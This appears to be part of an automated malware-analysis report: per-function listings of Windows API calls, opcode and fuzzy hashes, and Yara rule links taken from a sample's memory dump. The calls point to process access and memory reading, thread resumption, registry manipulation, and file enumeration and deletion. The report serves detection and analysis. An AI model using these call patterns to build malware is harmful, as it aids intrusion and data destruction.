Part of subcall function 03344375: lstrcat.KERNEL32(00000000,00000000), ref: 033443D7

RegOpenKeyExA.KERNEL32(03350A99,00000000,00000000,00020119,80000001,00000000,?,00000000,?,03350A99,80000001,?,0334B0CC), ref: 03360971
RegOpenKeyExA.ADVAPI32(03350A99,03350A99,00000000,00020019,80000001,?,03350A99,80000001,?,0334B0CC), ref: 03360987
RegCloseKey.ADVAPI32(80000001,80000001,?,0334B0CC,0334B0DC,?,03350A99,80000001,?,0334B0CC), ref: 033609D0

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Open$Closelstrcatlstrcpylstrlen
String ID:
API String ID: 4131162436-0
Opcode ID: afbc600ca802c2ad7444e767c143b31e8f830483ef9d0e4d7ff6637bb9b5303e
Instruction ID: 6dfb0d567d53a111072c9710a25bcbc1965bbe85155cb5120214b3eed0826eda
Opcode Fuzzy Hash: afbc600ca802c2ad7444e767c143b31e8f830483ef9d0e4d7ff6637bb9b5303e
Instruction Fuzzy Hash: 48214D76D00209BFDB15EF94DCC1D9EBBBDEB05318B0480A6EA14A7124E770AE54DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0334B8B7, Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,0644B7F0,?), ref: 0334B8CC
RegOpenKeyA.ADVAPI32(80000001,0644B7F0,?), ref: 0334B8D6
lstrlen.KERNEL32(0644B7F0,00000000,00000000,00000000,?,?,?,03344C3E,00000000,?,7673D3B0,74E05520,?,?,?,03341F86), ref: 0334B8F5

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: 71af39e8d28d5d1aa8da4fbbdade272d07f9b00414c51b730497cca75363d1ff
Instruction ID: 0ecd98a5b1bca72f4f5e6aac55d163eeb45feb57244dd0f442826dc3ae4f85c6
Opcode Fuzzy Hash: 71af39e8d28d5d1aa8da4fbbdade272d07f9b00414c51b730497cca75363d1ff
Instruction Fuzzy Hash: A8F03676101208BFEB25AF51DCC9EABBBACEB45795F108116FD4699144D670E680C770

Uniqueness

Uniqueness Score: -1.00%

Function 0334B9FA, Relevance: 3.1, APIs: 2, Instructions: 81registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0334B8B7: RegCreateKeyA.ADVAPI32(80000001,0644B7F0,?), ref: 0334B8CC
Part of subcall function 0334B8B7: lstrlen.KERNEL32(0644B7F0,00000000,00000000,00000000,?,?,?,03344C3E,00000000,?,7673D3B0,74E05520,?,?,?,03341F86), ref: 0334B8F5

RegQueryValueExA.KERNEL32(033567E9,00000000,00000000,?,03370068,?,00000001,033567E9,00000001,00000000,74E04D40,?,?,?,00000000,033567E9), ref: 0334BA4E
RegCloseKey.ADVAPI32(033567E9,?,?,?,00000000,033567E9,?,?,?,?,?,?,?,033477C7,?), ref: 0334BA9B

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CloseCreateQueryValuelstrlen
String ID:
API String ID: 971780412-0
Opcode ID: 3d59570916e023a57ab9b360a6f07c1ee2b83c1e35693bf0f36252d3d79f99c3
Instruction ID: 8078d7c4cba2add6843099f3863896abfaff1d8702fd920d1179d2727149579f
Opcode Fuzzy Hash: 3d59570916e023a57ab9b360a6f07c1ee2b83c1e35693bf0f36252d3d79f99c3
Instruction Fuzzy Hash: 9A311975D40218EFEB71EF94DCC4AAEBBFDEB04760F14416AE844A6254D3749A44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0335FE73, Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,033707F0,-0000000C,00000000,00000000), ref: 0335FEA3
GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,033707F0,-0000000C,00000000), ref: 0335FEEA

Part of subcall function 03360757: HeapFree.KERNEL32(00000000,00000000,033529D3,00000000), ref: 03360763

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
String ID:
API String ID: 552344955-0
Opcode ID: f90452a36d4b108a7af41d12f1dc1724f826d51f0c8cfe6a3983acefda1bac2d
Instruction ID: d5d1717de04421dc9db7d13adeec8fda72512be9a6210a5896b2391cebbd504f
Opcode Fuzzy Hash: f90452a36d4b108a7af41d12f1dc1724f826d51f0c8cfe6a3983acefda1bac2d
Instruction Fuzzy Hash: 65118E75D00208EBDB12DBA9CCD4FDEFBB9EF81694F288459F8049B250EB759A45CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0335AF63, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,033567E4,69B25F44,?,?,00000000), ref: 0335AFA0
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,033567E4), ref: 0335B001

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: cd5baf3aa6c540c8426e11c498eb8bf6bbd58ab96175425751bfd5fae7a4f83a
Instruction ID: 12603c8a94fd51e4dc1e3a87cdbf27b52538ff7b5e51f42b7ae80170f8ae7c90
Opcode Fuzzy Hash: cd5baf3aa6c540c8426e11c498eb8bf6bbd58ab96175425751bfd5fae7a4f83a
Instruction Fuzzy Hash: 3E11DAB6D04208EFDB21EBA4DD85EDEB7BCAB08345F104292B911E6148D7749B449B61

Uniqueness

Uniqueness Score: -1.00%

Function 0335D50D, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0334D814: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0334D84D
Part of subcall function 0334D814: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0334D883
Part of subcall function 0334D814: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0334D88F
Part of subcall function 0334D814: lstrcmpi.KERNEL32(?,00000000), ref: 0334D8CC
Part of subcall function 0334D814: StrChrA.SHLWAPI(?,0000002E), ref: 0334D8D5
Part of subcall function 0334D814: lstrcmpi.KERNEL32(?,00000000), ref: 0334D8E7
Part of subcall function 0334D814: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0334D938

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,0336D5C0,0000002C,0335DBFC,06448E36,?,00000000,03344AC6), ref: 0335D54C

Part of subcall function 0335D103: GetProcAddress.KERNEL32(?,00000000), ref: 0335D12C
Part of subcall function 0335D103: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,03354659,00000000,00000000,00000028,00000100), ref: 0335D14E

VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,0336D5C0,0000002C,0335DBFC,06448E36,?,00000000,03344AC6,?,00000318), ref: 0335D5D7

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
String ID:
API String ID: 4138075514-0
Opcode ID: bd0d01da291badd88492f94e88904c93c903e1438df51c32747057c4ec9aa633
Instruction ID: dc66f497e07fbd0c4cc20c2f564460856f59ec37770ed6158e769c8ad3ed2e19
Opcode Fuzzy Hash: bd0d01da291badd88492f94e88904c93c903e1438df51c32747057c4ec9aa633
Instruction Fuzzy Hash: CA21BE75D01228EFCF11DFA6DC80ADEBBB4BF08724F14852AF924B6254C3349A458FA4

Uniqueness

Uniqueness Score: -1.00%

Function 03352A1E, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000001,00000000,74E04D40,?,?,00000000,033567D3,?,?,?,?,?,?,?,033477C7), ref: 03352A33

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: dc1747df0e05f1eba6c743ac773bffdce8f42c6cf4d636f216068d7571fa4e4e
Instruction ID: a671eef914adaf72a9c84ea0a96392ccceae4bf80d258e96d6f02b1645c53b95
Opcode Fuzzy Hash: dc1747df0e05f1eba6c743ac773bffdce8f42c6cf4d636f216068d7571fa4e4e
Instruction Fuzzy Hash: 66315076E00255EFCB21DF98D8C0E9EB7B9FB44314F1988A9EA05EB205D770A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 03358CCB, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0335A536,033707F0,-0000000C,00000000,?,?,0335A538,0000000C,00000000,?), ref: 03358D06

Part of subcall function 0335F02A: NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,03371460), ref: 0335F041

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: 25acdba2381d0077872f35b3afb1c78c73f889e1769fa8d000129c63d3573d1f
Instruction ID: 1d271d40d2fcf0aac4df34c948f0e8d630b475586173e2f0e2bce4427f6acd9f
Opcode Fuzzy Hash: 25acdba2381d0077872f35b3afb1c78c73f889e1769fa8d000129c63d3573d1f
Instruction Fuzzy Hash: AF216076700208AFDB30DF5ADDC0E6AB7E9EF55690B18442AFD859F250E771EA00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03348B58, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 03348BAA

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 456412f17b5a51286d8f7558d7b13a08e6eb498cb7e3516d4c6ef24903dc5514
Instruction ID: a559590307466ea31bde3ab9931de379c05d7b464ea00d3b4da08b1bcddef8ad
Opcode Fuzzy Hash: 456412f17b5a51286d8f7558d7b13a08e6eb498cb7e3516d4c6ef24903dc5514
Instruction Fuzzy Hash: F211217660020AAFDF129F99DC81DDA7BA9FF48374B098125FD2996120C732D821DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0335A9CD, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON

Download Yara Rule

APIs

Part of subcall function 03351664: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,033711D0,00000000,0335A9D4,?,03348BC2,?), ref: 03351683
Part of subcall function 03351664: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,033711D0,00000000,0335A9D4,?,03348BC2,?), ref: 0335168E
Part of subcall function 03351664: _wcsupr.NTDLL ref: 0335169B
Part of subcall function 03351664: lstrlenW.KERNEL32(00000000), ref: 033516A3

ResumeThread.KERNEL32(00000004,?,03348BC2,?), ref: 0335A9E2

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
String ID:
API String ID: 3646851950-0
Opcode ID: 89d74e78f574721cedc27efcb5036c7902b448252d4bbd2a51fc5dce29afa246
Instruction ID: 306c8803738f345cb2732d7926673f97cc8e0e61a10670f44c954605c806a302
Opcode Fuzzy Hash: 89d74e78f574721cedc27efcb5036c7902b448252d4bbd2a51fc5dce29afa246
Instruction Fuzzy Hash: 2DD0A735604315EBEA23F720CD85F0BBD949F10B40F04C554FDC544462C771C850B541

Uniqueness

Uniqueness Score: -1.00%

Function 03345E9A, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a7a780a55052d12142499a62d3078975e899da01fb67ae0d25a13bc26d3fed00
Instruction ID: 6976e7e822787045ce13fc2b9bfc47aedaad0a130ddaad3e7a11926d074e7625
Opcode Fuzzy Hash: a7a780a55052d12142499a62d3078975e899da01fb67ae0d25a13bc26d3fed00
Instruction Fuzzy Hash: 2BB01276504100FFCB216F02DE45F0ABE26A750700F008015F3084007887390420EF15

Uniqueness

Uniqueness Score: -1.00%

Function 03367496, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03344C22: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,7673D3B0,74E05520,?,?,?,03341F86,?), ref: 03344C5A
Part of subcall function 03344C22: RtlAllocateHeap.NTDLL(00000000,?), ref: 03344C6E
Part of subcall function 03344C22: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,03341F86,?,?,?), ref: 03344C88
Part of subcall function 03344C22: RegCloseKey.ADVAPI32(?,?,?,?,03341F86,?,?,?), ref: 03344CB2

HeapFree.KERNEL32(00000000,0335AFCC,00000000,?,0335AFCC,00000000,00000001,00000000,74E04D40,?,?,?,0335AFCC,00000000), ref: 03367528

Part of subcall function 03342DDC: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,0335F48D,00000000,00000001,-00000007,?,00000000), ref: 03342DFE

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID:
API String ID: 1301464996-0
Opcode ID: c8e13465b1d099876d4f8f6c57a52e1aeb5f360184472f54d3b6e50892ce419c
Instruction ID: 96bdc323193875d437ec9bb2a2b9c57327fab8243c8b71fa3fa280eb3ca3843f
Opcode Fuzzy Hash: c8e13465b1d099876d4f8f6c57a52e1aeb5f360184472f54d3b6e50892ce419c
Instruction Fuzzy Hash: ED11A37AA10205EFDB25EB59DCD0EA9BBADEB48315F5084A9F702DB244D770ED408B20

Uniqueness

Uniqueness Score: -1.00%

Function 0334C74A, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03344C22: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,7673D3B0,74E05520,?,?,?,03341F86,?), ref: 03344C5A
Part of subcall function 03344C22: RtlAllocateHeap.NTDLL(00000000,?), ref: 03344C6E
Part of subcall function 03344C22: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,03341F86,?,?,?), ref: 03344C88
Part of subcall function 03344C22: RegCloseKey.ADVAPI32(?,?,?,?,03341F86,?,?,?), ref: 03344CB2

HeapFree.KERNEL32(00000000,00000000,00000000,033711D4,?,00000000,?,?,?,00000000,033569A3,03360CD6,00000000,00000000), ref: 0334C7BB

Part of subcall function 03345570: StrChrA.SHLWAPI(033711D4,0000002E,00000000,00000000,?,033711D4,0334E415,00000000,00000000,00000000), ref: 03345582
Part of subcall function 03345570: StrChrA.SHLWAPI(00000004,00000020,?,033711D4,0334E415,00000000,00000000,00000000), ref: 03345591

Part of subcall function 033516D2: CloseHandle.KERNEL32(0335683A,?,00000000,00000000,0334B0B2,00000000,00000000,00000000,00000000,74E5F5B0,0335683A), ref: 033516F8
Part of subcall function 033516D2: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 03351704
Part of subcall function 033516D2: GetModuleHandleA.KERNEL32(?,0644978E,?,00000000,00000000), ref: 03351724
Part of subcall function 033516D2: GetProcAddress.KERNEL32(00000000), ref: 0335172B
Part of subcall function 033516D2: Thread32First.KERNEL32(0335683A,0000001C), ref: 0335173B
Part of subcall function 033516D2: CloseHandle.KERNEL32(0335683A), ref: 03351783

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
String ID:
API String ID: 2627809124-0
Opcode ID: 644ec3b26c1cefab59a5f88365b0633cbd809d91ef1c01b8e800efadf3b5bf44
Instruction ID: 22049db1de76b496db541accb52b6e3e1d0d90c2d4db350164057ad66c10f08b
Opcode Fuzzy Hash: 644ec3b26c1cefab59a5f88365b0633cbd809d91ef1c01b8e800efadf3b5bf44
Instruction Fuzzy Hash: 11012CB6A11209BFDB21EBA9EDC4C9FBBEDEB44244B044055F801E3114EB71AE418B71

Uniqueness

Uniqueness Score: -1.00%

Function 0334E3B9, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03344C22: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,7673D3B0,74E05520,?,?,?,03341F86,?), ref: 03344C5A
Part of subcall function 03344C22: RtlAllocateHeap.NTDLL(00000000,?), ref: 03344C6E
Part of subcall function 03344C22: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,03341F86,?,?,?), ref: 03344C88
Part of subcall function 03344C22: RegCloseKey.ADVAPI32(?,?,?,?,03341F86,?,?,?), ref: 03344CB2

HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,0335699E,03360CD6,00000000,00000000), ref: 0334E42F

Part of subcall function 03345570: StrChrA.SHLWAPI(033711D4,0000002E,00000000,00000000,?,033711D4,0334E415,00000000,00000000,00000000), ref: 03345582
Part of subcall function 03345570: StrChrA.SHLWAPI(00000004,00000020,?,033711D4,0334E415,00000000,00000000,00000000), ref: 03345591

Part of subcall function 0336715A: lstrlen.KERNEL32(033494DB,00000000,?,?,?,?,033494DB,00000035,00000000,?,00000000), ref: 0336718A
Part of subcall function 0336715A: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 033671A0
Part of subcall function 0336715A: memcpy.NTDLL(00000010,033494DB,00000000,?,?,033494DB,00000035,00000000), ref: 033671D6
Part of subcall function 0336715A: memcpy.NTDLL(00000010,00000000,00000035,?,?,033494DB,00000035), ref: 033671F1
Part of subcall function 0336715A: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0336720F
Part of subcall function 0336715A: GetLastError.KERNEL32(?,?,033494DB,00000035), ref: 03367219
Part of subcall function 0336715A: HeapFree.KERNEL32(00000000,00000000,?,?,033494DB,00000035), ref: 0336723C

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
String ID:
API String ID: 730886825-0
Opcode ID: 69c3ccc1dc95dfd7f5824baec8714e44cd13a29e15982c49442cff90cdcd3510
Instruction ID: ee0e599c2d28c712b2ead3defd82e61b8230c902a8c35af8f61d0d5ce01d0f8d
Opcode Fuzzy Hash: 69c3ccc1dc95dfd7f5824baec8714e44cd13a29e15982c49442cff90cdcd3510
Instruction Fuzzy Hash: E5017C76E10205BBDB31EB95DC89F9E7BECEB08754F004095F601A7294E7B0BA40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 03350A77, Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03350A81

Part of subcall function 0336092A: RegOpenKeyExA.KERNEL32(03350A99,00000000,00000000,00020119,80000001,00000000,?,00000000,?,03350A99,80000001,?,0334B0CC), ref: 03360971
Part of subcall function 0336092A: RegOpenKeyExA.ADVAPI32(03350A99,03350A99,00000000,00020019,80000001,?,03350A99,80000001,?,0334B0CC), ref: 03360987
Part of subcall function 0336092A: RegCloseKey.ADVAPI32(80000001,80000001,?,0334B0CC,0334B0DC,?,03350A99,80000001,?,0334B0CC), ref: 033609D0

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Open$Closememset
String ID:
API String ID: 1685373161-0
Opcode ID: 803b15b572664f3a9fb46e3b6f9288c4d7a4bd49e1c6bcf62efa5ef30df5e119
Instruction ID: 8f78fd89dec41f6299fc000f1f2a473daa0f4a8f10dac83dce5ead00ea0c8400
Opcode Fuzzy Hash: 803b15b572664f3a9fb46e3b6f9288c4d7a4bd49e1c6bcf62efa5ef30df5e119
Instruction Fuzzy Hash: 56E0C739200208BBEB04EF40CC82F987BA9EF00340F00C014FE0C2E282EA32EA60C794

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0334BAF2, Relevance: 28.7, APIs: 19, Instructions: 234stringfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

Part of subcall function 0334251A: ExpandEnvironmentStringsW.KERNEL32(0335A43F,00000000,00000000,00000001,00000000,00000000,?,0335A43F,00000000,?,?,00000000), ref: 03342531
Part of subcall function 0334251A: ExpandEnvironmentStringsW.KERNEL32(0335A43F,00000000,00000000,00000000), ref: 0334254B

lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 0334BB3E
lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000006,?), ref: 0334BB4A
memset.NTDLL ref: 0334BB92
FindFirstFileW.KERNEL32(00000000,00000000), ref: 0334BBAD
lstrlenW.KERNEL32(0000002C), ref: 0334BBE5
lstrlenW.KERNEL32(?), ref: 0334BBED
memset.NTDLL ref: 0334BC10
wcscpy.NTDLL ref: 0334BC22
PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0334BC48
RtlEnterCriticalSection.NTDLL(?), ref: 0334BC7E

Part of subcall function 03360757: HeapFree.KERNEL32(00000000,00000000,033529D3,00000000), ref: 03360763

RtlLeaveCriticalSection.NTDLL(?), ref: 0334BC9A
FindNextFileW.KERNEL32(?,00000000), ref: 0334BCB3
WaitForSingleObject.KERNEL32(00000000), ref: 0334BCC5
FindClose.KERNEL32(?), ref: 0334BCDA
FindFirstFileW.KERNEL32(00000000,00000000), ref: 0334BCEE
lstrlenW.KERNEL32(0000002C), ref: 0334BD10
FindNextFileW.KERNEL32(?,00000000), ref: 0334BD86
WaitForSingleObject.KERNEL32(00000000), ref: 0334BD98
FindClose.KERNEL32(?), ref: 0334BDB3

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
String ID:
API String ID: 2962561936-0
Opcode ID: a8813d21be8a2ab3cc86194fe5afe5572a0f1d5a13f5844aab9876611ab8bbfa
Instruction ID: 8db62c136b1b56a4fda973e77ab12e0c13bbeaa103f0e61d15671cd15c87f390
Opcode Fuzzy Hash: a8813d21be8a2ab3cc86194fe5afe5572a0f1d5a13f5844aab9876611ab8bbfa
Instruction Fuzzy Hash: DE815871908305EFC761EF25DCC4A1BFBE8EF88304F088969F59596262DB74E8058F62

Uniqueness

Uniqueness Score: -1.00%

Function 0335E9C2, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,00000000,?,03371354,033667B8,03371354,00000000,?,?,0334B0CC), ref: 0335E9F5
GetLastError.KERNEL32(?,03371354,033667B8,03371354,00000000,?,?,0334B0CC,?,?,?,?,?,?,?,033477C7), ref: 0335EA03
NtSetInformationProcess.NTDLL ref: 0335EA5D
GetProcAddress.KERNEL32(?,00000000), ref: 0335EA9C
GetProcAddress.KERNEL32(?), ref: 0335EABD
TerminateThread.KERNEL32(?,00000000,0334B0CC,00000004,00000000), ref: 0335EB14
CloseHandle.KERNEL32(?), ref: 0335EB2A
CloseHandle.KERNEL32(?), ref: 0335EB50

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
String ID:
API String ID: 3529370251-0
Opcode ID: faa7889536e294cf3c6ebc934c06af199e184b99cfb8015c5866f8a2bc3472a5
Instruction ID: 99482656c52f23c710eed0fa9b8c918b3dec75745b9e5089fe553e853850fdd3
Opcode Fuzzy Hash: faa7889536e294cf3c6ebc934c06af199e184b99cfb8015c5866f8a2bc3472a5
Instruction Fuzzy Hash: 2B417C71508345AFD720EF21CCC8E9ABBECFB88315F044A29F966D2154E7709A48CB52

Uniqueness

Uniqueness Score: -1.00%

Function 03356467, Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0335CB9E: ExpandEnvironmentStringsW.KERNEL32(74B606E0,00000000,00000000,74B606E0,?,80000001,0334A627,?,80000001,?), ref: 0335CBAF
Part of subcall function 0335CB9E: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 0335CBCC

FreeLibrary.KERNEL32(?), ref: 0335659D

Part of subcall function 03348BDD: lstrlenW.KERNEL32(?,00000000,?,?,?,033564E2,?,?), ref: 03348BEA
Part of subcall function 03348BDD: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,033564E2,?,?), ref: 03348C13
Part of subcall function 03348BDD: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 03348C33
Part of subcall function 03348BDD: lstrcpyW.KERNEL32(-00000002,?), ref: 03348C4F
Part of subcall function 03348BDD: SetCurrentDirectoryW.KERNEL32(?,?,?,?,033564E2,?,?), ref: 03348C5B
Part of subcall function 03348BDD: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,033564E2,?,?), ref: 03348C5E
Part of subcall function 03348BDD: SetCurrentDirectoryW.KERNEL32(74E068C0,?,?,?,033564E2,?,?), ref: 03348C6A
Part of subcall function 03348BDD: GetProcAddress.KERNEL32(00000000,?), ref: 03348C87
Part of subcall function 03348BDD: GetProcAddress.KERNEL32(00000000,?), ref: 03348CA1
Part of subcall function 03348BDD: GetProcAddress.KERNEL32(00000000,?), ref: 03348CB7
Part of subcall function 03348BDD: GetProcAddress.KERNEL32(00000000,?), ref: 03348CCD
Part of subcall function 03348BDD: GetProcAddress.KERNEL32(00000000,?), ref: 03348CE3
Part of subcall function 03348BDD: GetProcAddress.KERNEL32(00000000,?), ref: 03348CF9

FindFirstFileW.KERNEL32(?,?,?,?), ref: 033564F3
lstrlenW.KERNEL32(?), ref: 0335650F
lstrlenW.KERNEL32(?), ref: 03356527

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

lstrcpyW.KERNEL32(00000000,?), ref: 03356540
lstrcpyW.KERNEL32(00000002), ref: 03356555

Part of subcall function 033433DF: lstrlenW.KERNEL32(?), ref: 033433EF
Part of subcall function 033433DF: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 03343411
Part of subcall function 033433DF: lstrcpyW.KERNEL32(00000000,?), ref: 0334343D
Part of subcall function 033433DF: lstrcatW.KERNEL32(00000000,?), ref: 03343450

FindNextFileW.KERNEL32(?,00000010), ref: 0335657D
FindClose.KERNEL32(00000002), ref: 0335658B

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
String ID:
API String ID: 1209511739-0
Opcode ID: 3fb4306b78bc1baf312294342cbd199abc80a7e45c36d4d57ed099bcd1c8f778
Instruction ID: b65589cf26fdc155e5880dec602fee3db5a625b6e6539699524999c338706995
Opcode Fuzzy Hash: 3fb4306b78bc1baf312294342cbd199abc80a7e45c36d4d57ed099bcd1c8f778
Instruction Fuzzy Hash: 8D4128728083059FC711EF60DC89A6FFBE8AB88B04F084D29F99496154DB31DA09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0335B4A5, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000), ref: 0335B4BD

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 0335B526
lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 0335B54E
RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 0335B5A0
DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 0335B5AB
FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 0335B5BE

Memory Dump Source

